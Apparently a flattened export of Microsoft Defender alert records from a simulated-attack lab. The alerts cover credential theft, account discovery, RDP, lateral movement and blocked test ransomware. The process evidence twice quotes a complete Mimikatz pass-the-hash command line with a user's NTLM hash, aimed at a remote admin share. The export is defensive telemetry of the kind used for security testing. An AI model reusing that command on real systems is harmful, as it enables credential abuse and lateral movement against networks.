"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001152861365786_1066719315
|
0001b09e-7603-4f3e-af36-e744217a8a08
| 486
|
MicrosoftDefenderForEndpoint
|
2022-09-30T06:14:46.1365973Z
|
2022-11-19T01:35:42.7033333Z
|
2022-10-01T01:36:00.5066667Z
|
2022-09-30T06:11:54.4489902Z
|
2022-09-30T06:11:54.4489902Z
|
Malicious credential theft tool execution detected
|
A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
|
CredentialAccess
|
Resolved
|
High
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
|
msftadmin@msdxv2.m365dpoc.com
| null | null |
[
"T1003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "rnd.local",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:14:46.34Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:14:46.34Z",
"fileName": "Step3-PasstheHash.txt",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "0b777e92992c7a306b8a28c7994078e334000781",
"sha256": "ba304316603a46ebca501de75bf7cf05c32e885e5b1120e0b94827002d0d1ad6",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:14:46.34Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-30T06:11:13.210308Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4064,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-09-30T06:11:53.2107428Z",
"processId": 11068,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-12T02:16:44.7666667Z
|
Suspicious
|
None
|
bob
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-11T08:19:38.9833333Z
|
Suspicious
|
None
|
svc_acct
|
MSDXV2
|
S-1-5-21-2300221942-1987151257-321556088-1111
|
89b6fc86-af84-47b2-a72d-325362598b2c
|
ronhd@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-22T08:57:24.1Z
|
Suspicious
|
None
|
ronhd
|
MSDXV8
|
S-1-5-21-2159906967-4174806019-1002223092-1111
| null |
ronhd@msdxv8.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-09-30T06:15:08.81Z
|
Suspicious
|
None
|
operator
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043450383303217_109385213
|
c70c4cd4-f758-4a87-ab55-ee9856976093
| 741
|
MicrosoftDefenderForEndpoint
|
2022-11-18T05:10:38.3303439Z
|
2022-11-19T01:35:46.6533333Z
|
2022-11-19T01:35:46.5533333Z
|
2022-11-18T05:04:12.7195838Z
|
2022-11-18T05:13:20.6644121Z
|
Suspicious User Account Discovery
|
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
|
Discovery
|
Resolved
|
Low
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1033",
"T1087",
"T1087.001"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Medium",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:10:38.4Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-12-22T08:48:24.7866667Z
|
Malicious
|
None
|
jeff
|
MSDXV8
|
S-1-5-21-2159906967-4174806019-1002223092-1104
| null |
jeff@msdxv8.m365dpoc.com
|
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
|
C:\M365DAttack\Mimikatz\x64
| 9,372
|
"mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv8.m365dpoc.com /run:\"powershell.exe dir \\msdxv8-win10b\C$ >> C:\M365DAttack\Step3-PasstheHash.txt\"" exit
|
2022-12-22T08:47:23.6053625Z
| 6,324
|
2022-12-22T08:47:11.8139068Z
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-13T16:06:08.5633333Z
|
Suspicious
|
None
|
darol
|
corp.local
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-11T08:19:38.9833333Z
|
Malicious
|
Active
|
SYSTEM
|
NT AUTHORITY
|
S-1-5-18
| null | null |
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
|
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
|
PSEXESVC.exe
|
C:\Windows
| 3,844
|
PSEXESVC.exe
|
2022-11-11T08:17:34.3184356Z
| 632
|
2022-11-11T08:13:27.8223756Z
|
services.exe
|
C:\Windows\System32
|
Detected
|
36150b3c1b69b5c2da9df4efd86ac6c166924a48
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-11T08:19:04.5766667Z
|
Suspicious
|
None
|
operator
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045930214994785_-457461802
|
668b61a7-e884-4a59-b731-73ba0effcdec
| 765
|
MicrosoftDefenderForEndpoint
|
2022-11-21T02:03:41.4995013Z
|
2022-11-21T03:45:17.6166667Z
|
2022-11-21T03:45:17.4759763Z
|
2022-11-21T01:55:13.6153204Z
|
2022-11-21T02:30:59.1966323Z
|
Suspicious RDP session
|
A combination of several suspicious RDP session activities has been detected in this device. Attackers might be attempting to establish a foothold in the environment by using various reconnaissance and persistence methods, then evade detection by tampering with and turning off security features to complete their objectives.
|
SuspiciousActivity
|
Resolved
|
High
| 50
|
SuccessfullyRemediated
| null | null |
WindowsDefenderAtp
|
e3270960-77a9-4f2b-a6ba-ea6a9d5e86d8
| null | null | null |
[
"T1003",
"T1021.001",
"T1555",
"T1558.003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Low",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": null,
"accountName": "MSDXV2-Win10V$",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV2",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:03:41.55Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:03:41.55Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:03:41.55Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Remediated",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:03:41.55Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\M365DAttack\\Rubeus",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Remediated",
"remediationStatusDetails": null,
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-21T02:03:41.55Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.1.4",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:08:38Z",
"fileName": "Rubeus.exe",
"filePath": "\\\\msdxv2-win10b\\C$\\Temp",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:08:38Z",
"fileName": "xcopy.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "a2d8e1a994cb7d774da09896cbb275238268b085",
"sha256": "1c58e29c25b4065893dd4fbb6ed27bd8a04828a30396d581d7c641d21e910dc8",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Clean"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-11T16:18:48.2433333Z
|
Malicious
|
None
|
msftadmin
| null |
S-1-12-1-2269820315-1261997569-3294602117-2733835123
|
874ab59b-8e01-4b38-85a3-5fc47303f3a2
|
msftadmin@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-09-30T05:04:51.8433333Z
|
Suspicious
|
None
|
alice
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1107
|
0808dea1-2ec8-41d2-8e3e-7c18309fab09
|
steve@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638095379380678312_-698725880
|
bd0a09a1-80c5-4179-b6c2-b8e48814680d
| 984
|
MicrosoftDefenderForEndpoint
|
2023-01-17T07:38:58.0678468Z
|
2023-01-17T07:44:35.38Z
| null |
2023-01-17T07:26:36.7324019Z
|
2023-01-17T07:26:36.7324019Z
|
'Encryptest' ransomware was prevented
|
Ransomware use common methods to encrypt files using keys that are known only to attackers. As a result, victims are unable to access the contents of the encrypted files. Most ransomware display or drop a ransom note—an image or an HTML file that contains information about how to obtain the attacker-supplied decryption tool for a fee.
To target documents or other files that contain user data, some ransomware look for files in certain locations and files with certain extension names. It is also common for ransomware to rename encrypted files so that they all use the same extension name.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
|
Ransomware
|
New
|
Medium
| 64
|
PartiallyRemediated
| null | null |
WindowsDefenderAv
|
51d03c45-b142-4de4-95df-01b0c259d8f6
| null | null |
Encryptest
|
[] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Unknown",
"deviceDnsName": "msdxv22-win10b.msdxv22.m365dpoc.com",
"firstSeen": "2023-01-17T07:15:11.3017269Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "7e5c8ca006a6a3ea72dbfbafdbcd8f5e14744ce5",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "None",
"tags": [],
"version": "21H1",
"vmMetadata": null
}
] |
[
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "7e5c8ca006a6a3ea72dbfbafdbcd8f5e14744ce5",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2023-01-17T07:38:58.1666667Z",
"fileName": "ransomware_testfile_unsigned.exe",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Controlled Folder Access",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Prevented",
"remediationStatusDetails": "Entity was pre-remediated by Windows Defender",
"sha1": "34dfe1b9798d8c5a67490d0e5f84d2e1a6ba4004",
"sha256": "59086539186f7b7b814ed93f181c2a8040c0cc1b88cde1a219e4bbaaf568b073",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "7e5c8ca006a6a3ea72dbfbafdbcd8f5e14744ce5",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2023-01-17T07:39:25.7Z",
"fileName": "UNSIGNED_ransomware_test_exe.exe",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Execution of untrusted or unsigned executables inside removable USB media",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Prevented",
"remediationStatusDetails": "Entity was pre-remediated by Windows Defender",
"sha1": "34dfe1b9798d8c5a67490d0e5f84d2e1a6ba4004",
"sha256": "59086539186f7b7b814ed93f181c2a8040c0cc1b88cde1a219e4bbaaf568b073",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045930747995801_1774314318
|
51dd330f-40c1-4ba4-bd2d-52e332a80a92
| 765
|
MicrosoftDefenderForEndpoint
|
2022-11-21T02:04:34.7995952Z
|
2022-11-21T02:36:19.8166667Z
| null |
2022-11-21T02:01:45.0435409Z
|
2022-11-21T02:33:42.858223Z
|
File dropped and launched from remote location
|
A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate.
|
LateralMovement
|
New
|
Medium
| 49
|
PendingApproval
| null | null |
WindowsDefenderAtp
|
17d50613-c135-4981-858e-86cdecb4e46e
| null | null | null |
[
"T1021.002",
"T1105",
"T1570"
] |
[
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "prod.env",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "High",
"tags": [
"semi auto"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] |
[
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV2",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:04:34.8433333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:04:34.8433333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-0-0",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:04:34.8433333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-21T02:04:34.8433333Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.9",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:04:34.8433333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:02:27.7361869Z",
"processId": 5760,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:04:34.8433333Z",
"fileName": "ntoskrnl.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
